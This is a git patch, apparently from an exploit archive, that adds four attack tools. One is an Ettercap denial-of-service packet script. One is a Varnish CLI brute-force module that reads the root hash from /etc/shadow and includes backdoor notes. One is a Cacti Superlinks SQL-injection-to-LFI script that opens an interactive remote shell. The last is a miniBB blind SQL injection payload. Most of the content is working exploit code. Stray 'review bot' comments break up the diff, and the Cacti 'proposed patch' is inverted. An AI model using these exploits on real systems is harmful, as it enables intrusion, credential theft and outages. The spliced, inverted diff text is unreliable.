From 9f4c7b310b66521fada6c69bbdbbffdee2823eb8 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 21 Dec 2014 04:51:18 +0000
Subject: [PATCH] Updated 12_21_2014
---
 files.csv | 4 +
 platforms/linux/dos/35580.rb | 203 ++++++++++++++++++++++++++++++++
 platforms/linux/remote/35581.rb | 168 ++++++++++++++++++++++++++
 platforms/php/webapps/35578.sh | 101 ++++++++++++++++
 platforms/php/webapps/35579.txt | 48 ++++++++
 5 files changed, 524 insertions(+)
 create mode 100755 platforms/linux/dos/35580.rb
 create mode 100755 platforms/linux/remote/35581.rb
 create mode 100755 platforms/php/webapps/35578.sh
 create mode 100755 platforms/php/webapps/35579.txt
diff --git a/files.csv b/files.csv
index 548e0dad0..0569f7d29 100755
--- a/files.csv
+++ b/files.csv
@@ -32041,3 +32041,7 @@ id,file,description,date,author,platform,type,port
 35575,platforms/php/webapps/35575.txt,"PrestaShop 1.3.6 'cms.php' Remote File Include Vulnerability",2011-04-08,KedAns-Dz,php,webapps,0
 35576,platforms/asp/webapps/35576.txt,"Omer Portal 3.220060425 'arama_islem.asp' Cross Site Scripting Vulnerability",2011-04-07,"kurdish hackers team",asp,webapps,0
 35577,platforms/php/webapps/35577.txt,"vtiger CRM 5.2.1 'vtigerservice.php' Cross Site Scripting Vulnerability",2011-04-07,"AutoSec Tools",php,webapps,0
+35578,platforms/php/webapps/35578.sh,"Cacti Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection Exploit",2014-12-19,Wireghoul,php,webapps,0
+35579,platforms/php/webapps/35579.txt,"miniBB 3.1 - Blind SQL Injection",2014-12-19,"Kacper Szurek",php,webapps,80
+35580,platforms/linux/dos/35580.rb,"Ettercap 0.8.0-0.8.1 - Multiple Denial of Service Vulnerabilities",2014-12-19,"Nick Sampanis",linux,dos,0
+35581,platforms/linux/remote/35581.rb,"Varnish Cache CLI Interface Remote Code Execution",2014-12-19,"Patrick Webster",linux,remote,6082
diff --git a/platforms/linux/dos/35580.rb b/platforms/linux/dos/35580.rb
new file mode 100755
index 000000000..f6e605b81
--- /dev/null
+++ b/platforms/linux/dos/35580.rb
@@ -0,0 +1,203 @@
+#Exploit Title: 6 Remote ettercap Dos exploits to 1
+#Date: 19/12/2014
+#Exploit Author: Nick Sampanis
+#Vendor Homepage: http://ettercap.github.io
+#Software Link: https://github.com/Ettercap/ettercap/archive/v0.8.1.tar.gz
+#Version: 8.0-8.1
+#Tested on: Linux
+#CVE: CVE-2014-6395 CVE-2014-9376 CVE-2014-9377 CVE-2014-9378 CVE-2014-9379
+#Make sure that you have installed packefu and pcaprub
+
+require 'packetfu'
+include PacketFu
+
+if ARGV.count < 4
+ puts "[-]Usage #{$PROGRAM_NAME} src_ip dst_ip src_mac iface"
+ puts "[-]Use valid mac for your interface, if you dont know"+
+ " victim's ip address use broadcast"
+ exit
+end
+
+def nbns_header
+ u = UDPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_daddr = ARGV[1]
+ u.ip_saddr = ARGV[0]
+ u.udp_src = 4444
+ u.udp_dst = 137
+ u.payload = "\xa0\x2c\x01\x10\x00\x01\x00\x00\x00\x00\x00\x00"
+ u.payload << "\x20\x46\x48\x45\x50\x46\x43\x45\x4c\x45\x48\x46"#name
+ u.payload << "\x43\x45\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43"#name
+ u.payload << "\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00"#name
+ u.payload << "\x00\x20" #type
+ u.payload << "\x00\x01" #class
+ u.payload << "A"*1000 #pad
+ u.recalc
+ u.to_w(ARGV[3])
+end
+def gg_client
+ u = TCPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_saddr = ARGV[0]
+ u.ip_daddr = ARGV[1]
+ u.tcp_src = 3333
+ u.tcp_dst = 8074
+ u.payload = "\x15\x00\x00\x00" #gg_type
+ u.payload << "\xe8\x03\x00\x00" #gg_len
+ u.payload << "A"*1000
+ u.recalc
+ u.to_w(ARGV[3])
+end
+def dhcp_header
+ u = UDPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_daddr = ARGV[0]
+ u.ip_saddr = ARGV[1]
+ u.udp_src = 67
+ u.udp_dst = 4444
+ u.payload = "\x02"*236
+ u.payload << "\x63\x82\x53\x63"
+ u.payload << "\x35"
+ u.payload << "\x00\x05\x00"
+ u.payload << "\x51"
+ u.payload << "\x00" #size
+ u.payload << "A" * 3 #pad
+ u.recalc
+ u.to_w(ARGV[3])
+end
+
+def mdns_header
+ u = 
UDPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_daddr = ARGV[1]
+ u.ip_saddr = ARGV[0]
+ u.udp_src = 4444
+ u.udp_dst = 5353
+ u.payload = "\x11\x11" #id
+ u.payload << "\x00\x00" #flags
+ u.payload << "\x00\x01" #questions
+ u.payload << "\x00\x00" #answer_rr
+ u.payload << "\x00\x00" #auth_rrs
+ u.payload << "\x00\x00" #additional_rr
+ u.payload << "\x06router\x05local\x00" #name
+ u.payload << "\x00\x01" #type
+ u.payload << "\x00\x01" #class
+ u.recalc
+ u.to_w(ARGV[3])
+end
+def mdns_dos_header
+ u = UDPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_daddr = ARGV[1]
+ u.ip_saddr = ARGV[0]
+ u.udp_src = 4444
+ u.udp_dst = 5353
+ u.payload = "\x11\x11" #id
+ u.payload << "\x00\x00" #flags
+ u.payload << "\x00\x01" #questions
+ u.payload << "\x00\x00" #answer_rr
+ u.payload << "\x00\x00" #auth_rrs
+ u.payload << "\x00\x00" #additional_rr
+ u.payload << "\x01"
+ u.payload << "\x00\x01" #type
+ u.payload << "\x00\x01" #class
+ u.payload << "A"*500
+ u.recalc
+ u.to_w(ARGV[3])
+end
+
+def pgsql_server
+ u = TCPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_saddr = ARGV[1]
+ u.ip_daddr = ARGV[0]
+ u.tcp_src = 5432
+ u.tcp_dst = 3333
+ u.payload = "\x52\x00\x00\x00\x08\x00\x00\x00\x03\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
+ u.recalc
+ u.to_w(ARGV[3])
+end
+def pgsql_client
+ u = TCPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_saddr = ARGV[0]
+ u.ip_daddr = ARGV[1]
+ u.tcp_src = 3333
+ u.tcp_dst = 5432
+ u.payload = 
"\x70\x00\x00\x5b\x00\x03\x00\x00\x75\x73\x65\x72\x02\x74\x65\x73\x74\x00\x64\x61\x74\x61\x62\x61\x73\x65\x02\x74\x65\x73\x74\x00\x63\x6c\x69\x65\x6e\x74\x5f\x65\x6e\x63\x6f\x64\x69\x6e\x67\x00\x55\x4e\x49\x43\x4f\x44\x45\x00\x44\x61\x74\x65\x53\x74\x79\x6c\x65\x00\x49\x53\x4f\x00\x54\x69\x6d\x65\x5a\x6f\x6e\x65\x00\x55\x53\x2f\x50\x61\x63\x69\x66\x69\x63\x00\x00"
+ u.recalc
+ u.to_w(ARGV[3])
+end
+
+def pgsql_client_shell
+ u = TCPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_saddr = ARGV[0]
+ u.ip_daddr = ARGV[1]
+ u.tcp_src = 3333
+ u.tcp_dst = 5432
+ u.payload = "\x70"
+ u.payload << "\x00\x00\x03\xe9" #len
+ u.payload << "A"*1000
+ u.payload << "\x00"
+ u.recalc
+ u.to_w(ARGV[3])
+end
+
+def radius_header
+ u = UDPPacket.new()
+ u.eth_saddr = ARGV[2]
+ u.eth_daddr = "ff:ff:ff:ff:ff:ff"
+ u.ip_daddr = ARGV[1]
+ u.ip_saddr = ARGV[0]
+ u.udp_src = 4444
+ u.udp_dst = 1645
+ u.payload = "\x01\x01\x00\xff\x00\x01\x00\x00\x00\x00\x00\x00\x20\x46\x48\x00\x50\x46\x43\xff\x01\x00\x48\x46\x01\x00\x50\x46\x46\x46\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41\x41\x00\x00\x20\x00\x01"
+ u.recalc
+ u.to_w(ARGV[3])
+end
+
+puts "[+]6 Remote ettercap Dos exploits to 1 by Nick Sampanis"
+puts "[+]-1- nbns plugin CVE-2014-9377"
+puts "[+]-2- gg dissector CVE-2014-9376"
+puts "[+]-3- dhcp dissector CVE-2014-9376"
+puts "[+]-4- mdns plugin CVE-2014-9378"
+puts "[+]-5- postgresql dissector CVE-2014-6395(works only in 8.0)"
+puts "[+]-6- radius dissector CVE-2014-9379"
+print "choice:"
+choice = $stdin.gets.chomp().to_i()
+
+case choice
+when 1
+ puts "[+]Sending nbns packet.."
+ nbns_header
+when 2
+ puts "[+]Sending client gg packet.."
+ gg_client
+when 3
+ puts "[+]Sending dhcp packet.."
+ dhcp_header
+when 4
+ puts "[+]Sending mdns packet.."
+ mdns_header
+ mdns_dos_header
+when 5
+ puts "[+]Sending pgsql packet.."
+ pgsql_client
+ pgsql_server
+ pgsql_client_shell
+when 6
+ puts "[+]Sending radius packet.."
+ radius_header
+else
+ puts "[-]Unrecognized command "
+end
+
diff --git a/platforms/linux/remote/35581.rb b/platforms/linux/remote/35581.rb
new file mode 100755
index 000000000..28e598fdc
--- /dev/null
+++ b/platforms/linux/remote/35581.rb
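Review bot: `choice = $stdin.gets.chomp().to_i()` raises NoMethodError when stdin is at EOF (gets returns nil), so the `else` branch that prints `[-]Unrecognized command` never gets to handle that case; `choice = ($stdin.gets || "").chomp.to_i` keeps the unrecognised-input branch as the only error path. The `#Version: 8.0-8.1` header disagrees with both the files.csv entry and the tarball named in `#Software Link` (v0.8.1); `#Version: 0.8.0-0.8.1` would make the three agree. Every builder from `nbns_header` to `radius_header` repeats the same Ethernet/IP assignments and reads ARGV from inside the method body; a shared helper taking the two IPs and the MAC as parameters would reduce each builder to its ports and payload and keep the argument handling in one place.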
@@ -0,0 +1,168 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::Tcp
+ include Msf::Auxiliary::Report
+ include Msf::Auxiliary::AuthBrute
+ include Msf::Auxiliary::Scanner
+
+ def initialize
+ super(
+ 'Name' => 'Varnish Cache CLI Interface Bruteforce Utility',
+ 'Description' => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
+ list of passwords. This module will also attempt to read the /etc/shadow root password hash
+ if a valid password is found. It is possible to execute code as root with a valid password,
+ however this is not yet implemented in this module.',
+ 'References' =>
+ [
+ [ 'OSVDB', '67670' ],
+ [ 'CVE', '2009-2936' ],
+ # General
+ [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ],
+ [ 'CVE', '1999-0502'] # Weak password
+ ],
+ 'Author' => [ 'patrick' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(6082),
+ OptPath.new('PASS_FILE', [ false, "File containing passwords, one per line",
+ File.join(Msf::Config.data_directory, "wordlists", "unix_passwords.txt") ]),
+ ], self.class)
+
+ deregister_options('USERNAME', 'USER_FILE', 'USERPASS_FILE', 'USER_AS_PASS', 'DB_ALL_CREDS', 'DB_ALL_USERS')
+ end
+
+ def run_host(ip)
+ connect
+ res = sock.get_once(-1,3) # detect banner
+ if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
+ vprint_status("Varnishd CLI detected - authentication required.")
+ each_user_pass { |user, pass|
+ sock.put("auth #{Rex::Text.rand_text_alphanumeric(3)}\n") # Cause a login fail. 
+ res = sock.get_once(-1,3) # grab challenge
+ if (res =~ /107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./) # 107 auth
+ challenge = $1
+ secret = pass + "\n" # newline is needed
+ response = challenge + "\n" + secret + challenge + "\n"
+ response = Digest::SHA256.hexdigest(response)
+ sock.put("auth #{response}\n")
+ res = sock.get_once(-1,3)
+ if (res =~ /107 \d+/) # 107 auth
+ vprint_status("FAILED: #{secret}")
+ elsif (res =~ /200 \d+/) # 200 ok
+ print_good("GOOD: #{secret}")
+
+ report_auth_info(
+ :host => rhost,
+ :port => rport,
+ :sname => ('varnishd'),
+ :pass => pass,
+ :proof => "#{res}",
+ :source_type => "user_supplied",
+ :active => true
+ )
+
+ sock.put("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} /etc/shadow\n") # only returns 1 line of any target file.
+ res = sock.get_once(-1,3)
+ if (res =~ /root:([\D\S]+):/) # lazy.
+ if ($1[0] == "!")
+ vprint_error("/etc/shadow root uid is disabled.\n")
+ else
+ print_good("/etc/shadow root enabled:\nroot:#{$1}:")
+ end
+ else
+ vprint_error("Unable to read /etc/shadow?:\n#{res}\n")
+ end
+
+ break
+ else
+ vprint_error("Unknown response:\n#{res}\n")
+ end
+ end
+ }
+ elsif (res =~ /Varnish Cache CLI 1.0/)
+ print_good("Varnishd CLI does not require authentication!")
+ else
+ vprint_error("Unknown response:\n#{res}\n")
+ end
+ disconnect
+ end
+end
+
+=begin
+
+aushack notes:
+
+- varnishd typically runs as root, forked as unpriv.
+- 'param.show' lists configurable options.
+- 'cli_timeout' is 60 seconds. param.set cli_timeout 99999 (?) if we want to inject payload into a client thread and avoid being killed.
+- 'user' is nobody. param.set user root (may have to stop/start the child to activate)
+- 'group' is nogroup. param.set group root (may have to stop/start the child to activate)
+- (unless varnishd is launched with -r user,group (read-only) implemented in v4, which may make priv esc fail).
+- vcc_unsafe_path is on. used to 'import ../../../../file' etc.
+- vcc_allow_inline_c is off. 
param.set vcc_allow_inline_c on to enable code execution. +- code execution notes: + +* quotes must be escaped \" +* \n is a newline +* C{ }C denotes raw C code. +* e.g. C{ unsigned char shellcode[] = \"\xcc\"; }C +* #import etc must be "newline", i.e. C{ \n#include \n dosomething(); }C (without 2x \n, include statement will not interpret correctly). +* C{ asm(\"int3\"); }C can be used for inline assembly / shellcode. +* varnishd has it's own 'vcl' syntax. can't seem to inject C randomly - must fit VCL logic. +* example trigger for backdoor: + +VCL server: + vcl.inline foo "vcl 4.0;\nbackend b { . host = \"127.0.0.1\"; } sub vcl_recv { if (req.url ~ \"^/backd00r\") { C{ asm(\"int3\"); }C } } \n" + vcl.use foo + start + +Attacker: + telnet target 80 + GET /backd00r HTTP/1.1 + Host: 127.0.0.1 + +(... wait for child to execute debug trap INT3 / shellcode). + +CLI protocol notes from website: + +The CLI protocol used on the management/telnet interface is a strict request/response protocol, there are no unsolicited transmissions from the responding end. + +Requests are whitespace separated tokens terminated by a newline (NL) character. + +Tokens can be quoted with "..." and common backslash escape forms are accepted: (\n), (\r), (\t), ( +), (\"), (\%03o) and (\x%02x) + +The response consists of a header which can be read as fixed format or ASCII text: + + 1-3 %03d Response code + 4 ' ' Space + 5-12 %8d Length of body + 13 \n NL character. +Followed by the number of bytes announced by the header. + +The Responsecode is numeric shorthand for the nature of the reaction, with the following values currently defined in include/cli.h: + +enum cli_status_e { + CLIS_SYNTAX = 100, + CLIS_UNKNOWN = 101, + CLIS_UNIMPL = 102, + CLIS_TOOFEW = 104, + CLIS_TOOMANY = 105, + CLIS_PARAM = 106, + CLIS_OK = 200, + CLIS_CANT = 300, + CLIS_COMMS = 400, + CLIS_CLOSE = 500 +}; +=end + 
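Review bot: `disconnect` at the end of `run_host` is reached only on the normal path; once `connect` has succeeded, any `sock.get_once` or `sock.put` that raises (timeout, peer close) leaves the socket open for the rest of the scan, so the body after `connect` belongs inside `begin … ensure disconnect end`. The challenge regex `/107 \d+\s\s\s\s\s\s\n(\w+)\n\nAuthentication required./` is written twice and hard-codes six characters of padding after the body length, which presumably only matches the fixed-size challenge body; a single constant such as `CHALLENGE_RE = /107 \d+\s+\n(\w+)\n\nAuthentication required\./` used in both places is easier to keep correct. `print_good("GOOD: #{secret}")` and `vprint_status("FAILED: #{secret}")` interpolate `pass + "\n"`, so every result line carries a stray blank line; print `pass` there and keep `secret` for the hash input only. The files.csv entry titles this module 'Varnish Cache CLI Interface Remote Code Execution' while its own 'Name' and 'Description' say it is a bruteforce utility and that code execution is not implemented; the index description should match the module.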
diff --git a/platforms/php/webapps/35578.sh b/platforms/php/webapps/35578.sh
new file mode 100755
index 000000000..14471a55c
--- /dev/null
+++ b/platforms/php/webapps/35578.sh
@@ -0,0 +1,101 @@
+#!/bin/sh
+##############
+# Exploit Title: Cacti - Superlinks Plugin 1.4-2 RCE(LFI) via SQL Injection
+# Date: 19/12/2014
+# Exploit Author: Wireghoul
+# Software Link: http://docs.cacti.net/plugin:superlinks
+# Identifiers: CVE-2014-4644, EDB-ID-33809
+# Exploit explanation through inline comments
+# Patch provided at the end
+#
+# This is the year where hope fails you -- Slipknot: Pulse of the maggots
+#
+##############
+
+echo -e "\e[32m *-*, \e[31m ___________"
+echo -e "\e[32m ,*\/|\`| ; \e[31m /.'_______\`.\\"
+echo -e "\e[32m \\' | |'; *, \e[31m /( (_______\`-'\\"
+echo -e "\e[32m \ \`| | ;/ ) \e[31m \`.\`.______ \.'"
+echo -e "\e[32m : |'| , / \e[31m \`..-.___>.'"
+echo -e "\e[32m :'| |, / \e[31m \`.__ .'\e[0m"
+echo -e " _________\e[32m:_|_|_;\e[0m_______________\e[31m\`.'\e[0m_______[Wireghoul]___"
+echo -e " CACTI SUPERLINKS PLUGIN 1.4-2 REMOTE CODE EXECUTION PoC"
+echo
+if [ -z $1 ]; then
+ echo -e "Usage $0 \n $0 http://example.com/cacti/plugins/superlinks/superlinks.php\n";
+ exit 2;
+fi
+
+# This exploit is a second order LFI through SQLI, so first we must write some data to disk
+# Luckily the application logs all sort of stuff, so lets poison the application log
+# The reason for this is manyfold, read on.
+curl --silent "$1?id=SHELLLLEHS" > /dev/null
+
+# Now lets analyse the vulnerability:
+# superlinks.php:21:if (isset($_GET['id'])) {
+# superlinks.php:22: $pageid=$_GET['id'];
+# superlinks.php:23:}
+# superlinks.php:24:
+# superlinks.php:25:$page = db_fetch_row("SELECT DISTINCT
+# superlinks.php:26: id,
+# superlinks.php:27: title,
+# superlinks.php:28: style,
+# superlinks.php:29: contentfile
+# superlinks.php:30: FROM (superlinks_pages, superlinks_auth)
+# superlinks.php:31: WHERE superlinks_pages.id=superlinks_auth.pageid
+# superlinks.php:32: AND id=" . $pageid . 
"
+# This is where the injection occurs, we can now union select 1,2,3,4 -- ftw
+# However the real fun occurs a few lines later
+# superlinks.php:57: $my_file = $config["base_path"] . "/plugins/superlinks/content/" . $page['contentfile'];
+# superlinks.php:58:
+# superlinks.php:59: if (file_exists($my_file)) {
+# superlinks.php:60: @include_once($my_file);
+# We can now include a file of our choosing (LFI) based on the data returned from the SQLi
+# There are only a few problems:
+# * We cannot use strings/quotes as magic quotes are usually on
+# * We do not know the local path for the LFI
+# * Usual tricks like /proc/self* have been patched
+# * Database server and web server may be different hosts
+# Lets solve the easy one first, we dont need to quote our strings, hex encoding works great
+# The second one is a little trickier, we can brute force LFI locations... or
+# We can dynamically locate a file path which is stored in the database and present on the webserver
+# $ mysqldump cacti | grep '\.log'
+# INSERT INTO `settings` VALUES ('path_php_binary','/usr/bin/php'),('path_rrdtool','/usr/bin/rrdtool'),('poller_lastrun','1414565401'),('path_webroot','/usr/share/cacti/site'),('date','2014-10-29 17:50:02'),('stats_poller','Time:0.1182 Method:cmd.php Processes:1 Threads:N/A Hosts:2 HostsPerProcess:2 DataSources:0 RRDsProcessed:0'),('stats_recache','RecacheTime:0.0 
HostsRecached:0'),('path_snmpwalk','/usr/bin/snmpwalk'),('path_snmpget','/usr/bin/snmpget'),('path_snmpbulkwalk','/usr/bin/snmpbulkwalk'),('path_snmpgetnext','/usr/bin/snmpgetnext'),('path_cactilog','/var/log/cacti/cacti.log'),('snmp_version','net-snmp'),('rrdtool_version','rrd-1.4.x'),('superlinks_tabstyle','0'),('superlinks_hidelogo','0'),('superlinks_hideconsole','0'),('superlinks_db_version','1.4'),('auth_method','1'),('guest_user','guest'),('user_template','0'),('ldap_server',''),('ldap_port','389'),('ldap_port_ssl','636'),('ldap_version','3'),('ldap_encryption','0'),('ldap_referrals','0'),('ldap_mode','0'),('ldap_dn',''),('ldap_group_require',''),('ldap_group_dn',''),('ldap_group_attrib',''),('ldap_group_member_type','1'),('ldap_search_base',''),('ldap_search_filter',''),('ldap_specific_dn',''),('ldap_specific_password','');
+# $ ls -la /var/log/cacti/cacti.log
+# -rw-r----- 1 www-data www-data 5838 Oct 29 17:50 /var/log/cacti/cacti.log
+# $ tail /var/log/cacti/cati.log
+# ERROR: SQL Assoc Failed!, Error:'1064', SQL:"SELECT graph_templates.id, graph_templates.name FROM (graph_local,graph_templates,graph_templates_graph) WHERE graph_local.id=graph_templates_graph.local_graph_id AND graph_templates_graph.graph_template_id=graph_templates.id AND graph_local.host_id=1 AND graph_templates.id=12 select 1,2,3,4 -- GROUP BY graph_templates.id ORDER BY graph_templates.name"
+# WINRAR! 
+
+# We can now include the poisoned log file by fetching the log path from the database
+# and prepending it with the normal directory traversal pattern ../../../ using concat()
+# We traverse 8 deep, that's usually enough
+echo -ne "Dropping into shell, type exit to quit.\ncactishell> "
+while read line; do
+if [ "$line" == "exit" ]; then
+ exit
+fi
+comand=`echo -n $line | sed -e's/ /+/g'`
+curl --silent "$1?id=123+union+select+1,2,3,concat(0x2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f2e2e2f,value)+from+settings+where+name=0x706174685f63616374696c6f67+--+-&c=$comand" | \
+sed -n '/SHELL/, $p' | \
+sed -e 's/.*SHELL//' |\
+sed '/LLEHS/, $d'
+echo -n "cactishell> "
+done
+
+# Proposed patch
+# Vendor has a patch in a SVN repo somewhere:
+# http://bugs.cacti.net/bug_view_advanced_page.php?bug_id=2475
+# Yet has not made the patch available, or responded to requests to do so:
+# http://forums.cacti.net/viewtopic.php?t=53711
+#--- superlinks.php 2014-12-18 02:05:37.706013833 -0500
+#+++ superlinks.php 2014-12-18 02:05:09.694014497 -0500
+#@@ -19,7 +19,7 @@
+#
+# $pageid = 0;
+# if (isset($_GET['id'])) {
+#- $pageid=intval($_GET['id']);
+#+ $pageid=$_GET['id'];
+# }
+#
+# $page = db_fetch_row("SELECT DISTINCT
\ No newline at end of file
diff --git a/platforms/php/webapps/35579.txt b/platforms/php/webapps/35579.txt
new file mode 100755
index 000000000..29740a341
--- /dev/null
+++ b/platforms/php/webapps/35579.txt
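Review bot: The "Proposed patch" at the end of the file is inverted: the `#-` line removes `$pageid=intval($_GET['id']);` and the `#+` line puts back the unsanitised `$pageid=$_GET['id'];`, and the `#---`/`#+++` timestamps run backwards, so anyone applying it as written would strip the fix rather than add it; the two lines should read `#- $pageid=$_GET['id'];` / `#+ $pageid=intval($_GET['id']);`. The shebang is `#!/bin/sh` but the script uses bash-only constructs — `echo -e` escape processing, `[ "$line" == "exit" ]` instead of `=`, and the unquoted `[ -z $1 ]` — so under dash the banner prints literal `-e` and the comparison is a syntax error; `#!/bin/bash`, or `"$1"` and `=`, would make the interpreter match the syntax.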
@@ -0,0 +1,48 @@
+# Exploit Title: miniBB 3.1 Blind SQL Injection
+# Date: 23-11-2014
+# Software Link: http://www.minibb.com/
+# Exploit Author: Kacper Szurek
+# Contact: http://twitter.com/KacperSzurek
+# Website: http://security.szurek.pl/
+# CVE: CVE-2014-9254
+# Category: webapps
+
+1. Description
+
+preg_match() only check if $_GET['code'] contains at least one letter or digit (missing ^ and $ inside regexp).
+
+File: bb_func_unsub.php
+$usrid=(isset($_GET['usrid'])?$_GET['usrid']+0:0);
+
+$allowUnsub=FALSE;
+$chkCode=FALSE;
+
+if(isset($_GET['code']) and preg_match("#[a-zA-Z0-9]+#", $_GET['code'])){
+ //trying to unsubscribe directly from email
+ $chkField='email_code';
+ $chkVal=$_GET['code'];
+ $userCondition=TRUE;
+ $chkCode=TRUE;
+}
+else{
+ //manual unsubsribe
+ $chkField='user_id';
+ $chkVal=$user_id;
+ $userCondition=($usrid==$user_id);
+}
+
+if ($topic!=0 and $usrid>0 and $userCondition and $ids=db_simpleSelect(0, $Ts, 'id, user_id', 'topic_id', '=', $topic, '', '', $chkField, '=', $chkVal))
+
+http://security.szurek.pl/minibb-31-blind-sql-injection.html
+
+2. Proof of Concept
+
+http://minibb-url/index.php?action=unsubscribe&usrid=1&topic=1&code=test' UNION SELECT 1, IF(substr(user_password,1,1) = CHAR(99), SLEEP(5), 0) FROM minibbtable_users WHERE user_id = 1 AND username != '
+
+This SQL will check if first password character user ID=1 is ?c?.
+
+If yes, it will sleep 5 seconds.
+
+3. Solution:
+
+http://www.minibb.com/forums/news-9/blind-sql-injection-fix-6430.html
\ No newline at end of file